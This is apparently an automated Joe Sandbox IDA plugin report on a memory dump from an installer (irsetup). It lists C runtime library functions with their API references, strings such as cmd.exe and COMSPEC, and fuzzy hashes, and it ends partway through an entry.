Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 83bcc1b7ed02ac48ed80f5db585f6cc6e072ce756355eb0b1e4c509f4418eeb5
Instruction ID: 55b8966ed909c531b91f61cb8372e423ff6e17214bc975dbaad7cba1e7de9a49
Opcode Fuzzy Hash: 83bcc1b7ed02ac48ed80f5db585f6cc6e072ce756355eb0b1e4c509f4418eeb5
Instruction Fuzzy Hash: BF22F472204AC882E7E39B55E4843ED2B91F3897D4F98C516FA5A877D2DE38C64DC302

Function 000000018002CB8C Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018002CBDD
_wsopen_s.LIBCMT ref: 000000018002CE0B

Strings

w, xrefs: 000000018002CBD8
UTF-16LE, xrefs: 000000018002CD9A
, xrefs: 000000018002CD61
=, xrefs: 000000018002CD66
, xrefs: 000000018002CD36
UTF-8, xrefs: 000000018002CD77
, xrefs: 000000018002CDE7
ccs, xrefs: 000000018002CD3B
UNICODE, xrefs: 000000018002CDBD
, xrefs: 000000018002CBC9
r, xrefs: 000000018002CBD3
a, xrefs: 000000018002CBCE
, xrefs: 000000018002CD72

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno_wsopen_s
String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
API String ID: 1497100469-1561892669
Opcode ID: 809ac7aed290ffe497205082508d5eeb03938b6ee526942d5b77e887368b1888
Instruction ID: d6da21fed4115c722398ce3e3561bd801ec631ccb665ac6cd961f74e4c6af8c6
Opcode Fuzzy Hash: 809ac7aed290ffe497205082508d5eeb03938b6ee526942d5b77e887368b1888
Instruction Fuzzy Hash: BF81B3B2A0824C45FBF74A25A904FEA5FC1675D7C4F29C425FE4A069D6DE79CB488303

Function 00000001800383A0 Relevance: 24.3, APIs: 16, Instructions: 348COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 000000018003840D
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038421
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038524

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CompareErrorInfoLastString
String ID:
API String ID: 3723911898-0
Opcode ID: a7c54db4274c7bd852224f2bab33c57a8df35dff28d89205a04333a6085d80a5
Instruction ID: caf065914ce32c901bdc0da071f13ae403a8d6858991746fbe812b61d08b1fd8
Opcode Fuzzy Hash: a7c54db4274c7bd852224f2bab33c57a8df35dff28d89205a04333a6085d80a5
Instruction Fuzzy Hash: 77E1AE722047888AEBB39F2194443EA2B92BB497D4F56C565FA5A47BC4DF38CB489700

Function 000000018003CAA8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 197processsynchronizationCOMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018003CAF1
_errno.LIBCMT ref: 000000018003CAF8
__doserrno.LIBCMT ref: 000000018003CC73
CreateProcessA.KERNEL32 ref: 000000018003CCBE
GetLastError.KERNEL32 ref: 000000018003CCC6
free.LIBCMT ref: 000000018003CCD7
WaitForSingleObject.KERNEL32 ref: 000000018003CD03
GetExitCodeProcess.KERNEL32 ref: 000000018003CD16
CloseHandle.KERNEL32 ref: 000000018003CD34
CloseHandle.KERNEL32 ref: 000000018003CD46
_errno.LIBCMT ref: 000000018003CD51

Strings

cmd.exe, xrefs: 000000018003CAB3

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CloseHandleProcess__doserrno_errno$CodeCreateErrorExitLastObjectSingleWaitfree
String ID: cmd.exe
API String ID: 1143201056-723907552
Opcode ID: 1ec64bca767f0ce2c30d7568805568113e7c73b22f9ca0acadf98c084daf04b7
Instruction ID: bc4d664b3f0a0b6ab182b77c7d05c4b3f8bc629965aac2ee09c429f38f9c3594
Opcode Fuzzy Hash: 1ec64bca767f0ce2c30d7568805568113e7c73b22f9ca0acadf98c084daf04b7
Instruction Fuzzy Hash: 4181B432204A8881EBA38B25E4817EF7761F3897E4F56C212FA59837D1DF79C649C702

Function 00000001800124E0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 179COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002753C: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,000000018001252F), ref: 000000018002754A

Part of subcall function 000000018002721C: __getgmtimebuf.LIBCMT ref: 000000018002722E

wcsftime.LIBCMT ref: 0000000180012761

Strings

sec, xrefs: 00000001800125D4
!, xrefs: 000000018001254D
hour, xrefs: 0000000180012616
yday, xrefs: 00000001800126D3
wday, xrefs: 00000001800126AD
min, xrefs: 00000001800125F5
day, xrefs: 0000000180012637
month, xrefs: 000000018001265D
%, xrefs: 000000018001271D
isdst, xrefs: 00000001800126FC
year, xrefs: 0000000180012687

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Time$FileSystem__getgmtimebufwcsftime
String ID: !$%$day$hour$isdst$min$month$sec$wday$yday$year
API String ID: 599264643-611614131
Opcode ID: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
Instruction ID: 3f311966028a47db9d835d2390ad335689aacd3f767fa76c62ac224867e760a9
Opcode Fuzzy Hash: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
Instruction Fuzzy Hash: 1F71B271204AC889EBA6EB21E4513EA7352EB8D7D1F48C212BD5A073DADE38C70DC740

Function 0000000180028660 Relevance: 18.1, APIs: 11, Strings: 1, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00000001800286AC

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Part of subcall function 0000000180036640: free.LIBCMT ref: 000000018003665E
Part of subcall function 0000000180036640: free.LIBCMT ref: 0000000180036670
Part of subcall function 0000000180036640: free.LIBCMT ref: 0000000180036682
Part of subcall function 0000000180036640: free.LIBCMT ref: 0000000180036694
Part of subcall function 0000000180036640: free.LIBCMT ref: 00000001800366A6
Part of subcall function 0000000180036640: free.LIBCMT ref: 00000001800366B8
Part of subcall function 0000000180036640: free.LIBCMT ref: 00000001800366CA

free.LIBCMT ref: 00000001800286CE
free.LIBCMT ref: 00000001800286E6
free.LIBCMT ref: 00000001800286F2
free.LIBCMT ref: 0000000180028716
free.LIBCMT ref: 000000018002872A
free.LIBCMT ref: 0000000180028739
free.LIBCMT ref: 0000000180028745
free.LIBCMT ref: 0000000180028772
free.LIBCMT ref: 000000018002879A
free.LIBCMT ref: 00000001800287B4

Strings

%.14g, xrefs: 000000018002866A

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID: %.14g
API String ID: 1012874770-3267037135
Opcode ID: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
Instruction ID: af0bc440c63a20798cdb7aeb7fc5255632f61c08f109e4c0f4434e2bfff94dc4
Opcode Fuzzy Hash: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
Instruction Fuzzy Hash: EF41EE36602A8884EFE79F65D4553FC2360AB8CBD8F188432FA194A795CF74CB99D710

Function 000000018002C2FC Relevance: 18.1, APIs: 12, Instructions: 82COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 000000018002C31B

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 000000018002C329
free.LIBCMT ref: 000000018002C337
free.LIBCMT ref: 000000018002C345
free.LIBCMT ref: 000000018002C353
free.LIBCMT ref: 000000018002C361
free.LIBCMT ref: 000000018002C372
free.LIBCMT ref: 000000018002C38A
_lock.LIBCMT ref: 000000018002C394
free.LIBCMT ref: 000000018002C3C2
_lock.LIBCMT ref: 000000018002C3D7
free.LIBCMT ref: 000000018002C421

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_lock$ErrorFreeHeapLast_errno
String ID:
API String ID: 1575098132-0
Opcode ID: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
Instruction ID: cb46baaaa23a1663d07188939efbc8fc8364fa3fc97ea10782da97baff015f18
Opcode Fuzzy Hash: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
Instruction Fuzzy Hash: D6310E35302A4885FEEBEB659061BFC2351AF8DBC4F48D526F91A476C6CE54CB4C8316

Function 000000018003B0E8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 256COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003B110

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

__wtomb_environ.LIBCMT ref: 000000018003B209
_errno.LIBCMT ref: 000000018003B213
free.LIBCMT ref: 000000018003B305
SetEnvironmentVariableA.KERNEL32 ref: 000000018003B450
_errno.LIBCMT ref: 000000018003B45E
free.LIBCMT ref: 000000018003B46C
free.LIBCMT ref: 000000018003B479
free.LIBCMT ref: 000000018003B48B

Strings

COMSPEC, xrefs: 000000018003B0F2

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
String ID: COMSPEC
API String ID: 3451773520-1631433037
Opcode ID: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
Instruction ID: 4ba3cebf007e37312f75b89635b496495a772fde7ddc12decf222640a794de8d
Opcode Fuzzy Hash: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
Instruction Fuzzy Hash: 4EA1B036601A9C81FAE3AB15A9003EF6391F7887DCF56C615BB5A87785CF38879D8300

Function 0000000180036A98 Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 0000000180036BBF

Part of subcall function 000000018002FB40: GetLastError.KERNEL32 ref: 000000018002FBA9
Part of subcall function 000000018002FB40: free.LIBCMT ref: 000000018002FC35

free.LIBCMT ref: 0000000180036D88
free.LIBCMT ref: 0000000180036D98
free.LIBCMT ref: 0000000180036DA8
free.LIBCMT ref: 0000000180036DB4
free.LIBCMT ref: 0000000180036E09
free.LIBCMT ref: 0000000180036E11
free.LIBCMT ref: 0000000180036E19
free.LIBCMT ref: 0000000180036E21
free.LIBCMT ref: 0000000180036E2B

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorInfoLast
String ID:
API String ID: 189849726-0
Opcode ID: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
Instruction ID: 0cfcddc6f49efeab6f4f61afc9e86eb49e25840f6bfa506a9695891ebaf45d4b
Opcode Fuzzy Hash: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
Instruction Fuzzy Hash: 27B19F32604AD486DBA2CF25E4503EEB7A4F748B84F95C126FB99877A5DF38C649C700

Function 000000018003D45C Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D576
malloc.LIBCMT ref: 000000018003D58D
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D64C
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D68C
free.LIBCMT ref: 000000018003D69A
free.LIBCMT ref: 000000018003D6BC

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ByteCharMultiWide$Infofree$malloc
String ID:
API String ID: 1309074677-0
Opcode ID: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
Instruction ID: ef16a251ce0a63a525c3aa4d0bbb8d493572552397f9166123f23fc75798a009
Opcode Fuzzy Hash: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
Instruction Fuzzy Hash: DA61E432204B8886E7A39F25B4403EB77D5F7897E8F158626FA5A43BD4DF38C6498700

Function 0000000180038D00 Relevance: 15.1, APIs: 10, Instructions: 121COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D2F
GetLastError.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D49
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D6F
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038DC4
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E00
free.LIBCMT ref: 0000000180038E0E
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E19
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E31
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E72
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E8E

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
String ID:
API String ID: 994105223-0
Opcode ID: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
Instruction ID: d9ef7338b76749b8665854ab0faee35fb482f0185a0d43e1efd96c80377bbde6
Opcode Fuzzy Hash: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
Instruction Fuzzy Hash: 3E41C33260475C82EAE7AF12A9443AB7791BB5CBC0F1AC454FA4707BA9CF78D658D300

Function 0000000180003220 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001EEF0: _errno.LIBCMT ref: 000000018001EF10

_wfreopen.LIBCMT ref: 00000001800032D3

Part of subcall function 000000018001EEF0: _errno.LIBCMT ref: 000000018001EFBA

_errno.LIBCMT ref: 00000001800033C2

Strings

reopen, xrefs: 00000001800032E2
=stdin, xrefs: 0000000180003262
cannot %s %s: %s, xrefs: 00000001800033E5
read, xrefs: 00000001800033DE
open, xrefs: 0000000180003328
@%s, xrefs: 00000001800032F9

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_wfreopen
String ID: =stdin$@%s$cannot %s %s: %s$open$read$reopen
API String ID: 1073068216-1171916245
Opcode ID: 85cd4c32182d132d2ed86845f1803cd7cc927c8458ce75903d91d74d90aa5753
Instruction ID: 1853566ffd4394b5b462cd73b286757f755f6c0d306ff0bd9e01786340f21f8e
Opcode Fuzzy Hash: 85cd4c32182d132d2ed86845f1803cd7cc927c8458ce75903d91d74d90aa5753
Instruction Fuzzy Hash: 8051B731214A8881FEE7EB66A5813EE7795AB8E7C0F44D112FA4A47796DF38C34D8740

Function 0000000180037A04 Relevance: 13.7, APIs: 9, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A64
GetLastError.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A76
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037AD6
malloc.LIBCMT ref: 0000000180037B42
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037B8C
GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037BA3
free.LIBCMT ref: 0000000180037BB4
GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037C31
free.LIBCMT ref: 0000000180037C41

Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
Part of subcall function 000000018003D45C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
Part of subcall function 000000018003D45C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
String ID:
API String ID: 3804003340-0
Opcode ID: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
Instruction ID: b72f06588925f2ba8d140ce4529a3e9eb07fecfdf33ec2bb692ee0be162e1f54
Opcode Fuzzy Hash: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
Instruction Fuzzy Hash: 1F618232300A888AE7B39F25E4407DAA7A2F74CBE8F158615FA1D53BD5DF74CA498740

Function 000000018002097C Relevance: 13.6, APIs: 9, Instructions: 98COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001800209A5
DecodePointer.KERNEL32 ref: 00000001800209D8
DecodePointer.KERNEL32 ref: 00000001800209F5
DecodePointer.KERNEL32 ref: 0000000180020A34
DecodePointer.KERNEL32 ref: 0000000180020A4D
DecodePointer.KERNEL32 ref: 0000000180020A5C
_initterm.LIBCMT ref: 0000000180020A9B
_initterm.LIBCMT ref: 0000000180020AAE
ExitProcess.KERNEL32 ref: 0000000180020AE7

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer$_initterm$ExitProcess_lock
String ID:
API String ID: 2551688548-0
Opcode ID: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
Instruction ID: 0925ad66611745c8ce2a8e9b3f352f1836afede7ec58ebd276bd38845fb38505
Opcode Fuzzy Hash: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
Instruction Fuzzy Hash: D1416D31212B4885EAE3DB11E8817DA63A4B78C7C4F64C025BA8D437A7EF78C65D8742

Function 0000000180032F64 Relevance: 13.6, APIs: 9, Instructions: 89COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180032F8D
_errno.LIBCMT ref: 0000000180032F96
__doserrno.LIBCMT ref: 0000000180032FE5
_errno.LIBCMT ref: 0000000180032FEC

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
Instruction ID: a7b466250e8cbf9d99a39da3f19165df2e40a545f04f40789bff1e1118104bb7
Opcode Fuzzy Hash: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
Instruction Fuzzy Hash: 0E31073261068841F797AF26A8827EE7751B7C97E0F56C616FA69077D2CE38C609C700

Function 0000000180039498 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00000001800394C1
_errno.LIBCMT ref: 00000001800394CA
__doserrno.LIBCMT ref: 000000018003951A
_errno.LIBCMT ref: 0000000180039521

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
